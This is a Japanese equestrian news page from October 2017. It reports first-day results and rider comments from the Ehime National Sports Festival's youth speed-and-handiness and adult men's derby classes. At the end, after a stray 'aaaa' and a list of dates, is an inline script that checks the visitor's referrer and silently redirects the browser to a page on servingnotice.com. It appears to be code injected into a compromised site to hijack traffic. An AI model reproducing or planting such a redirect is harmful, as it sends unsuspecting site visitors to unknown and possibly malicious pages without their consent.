News
2017 年 10 月 5 日
《えひめ国体馬術競技》 第1日速報-その2

【第5競技 少年 スピードアンドハンディネス競技】
 この競技には26人馬が出場しました。唯一60秒を切るタイムを出したのは杉本瑞生&サンドウィッチ・コア(福島県)で、59.66秒でした。2位は60.99秒の木村友哉&C’sセシル(奈良県)、3位は61.67秒の本富士雄&ディナスティ(鹿児島県)でした。


▲杉本瑞生&サンドウィッチ・コア
「止まることがない馬なので、僕が馬の邪魔をしないように静かに乗ることを意識していました。回転も言われた通りにできました。とにかく馬に助けてもらっています。明日の標準競技でも普通に帰ってこられるように頑張ります」

【第6競技 成年男子 ダービー競技】
 長丁場のダービー競技のコースには17障害(20飛越)が設置されました。オリジナルコースをクリアラウンドしてジャンプオフに進んだのは6人馬。タイムが早かった2人馬がそれぞれ1落下ずつしてしまい、ジャンプオフもノーミスで走行した4人馬のタイム勝負となりました。1位は増山大治郎&オーロラボレアリス(茨城県)34.51秒、2位は岡村実&ウロボロス(奈良県)34.75秒、3位は西塚重二&メジャーブラウン(埼玉県)35.24秒でした。


▲増山大治郎&オーロラボレアリス
「水が苦手な馬なので、水濠がどうなることかと心配だったのですが、意外と普通に入ってくれました。ジャンプオフでは小回りを意識して、あとは無心で走りました。満点ゴールして嬉しくて、さらに一番時計で二度嬉しいという感じでした。最終日は六段で兄弟対決します」
 

aaaa

  • 2017.10.16
  • 2017.10.23
  • 2017.10.19
  • 2017.10.23
  • 2017.10.16
  • 2017.10.18
  • 2017.04.20
  • 2017.10.16
  • 2017.10.09
  • 2017.10.23
  • 2017.10.12
  • 2016.05.06
  • 2017.08.31


var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter2/intermediary.html?outlet80com"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;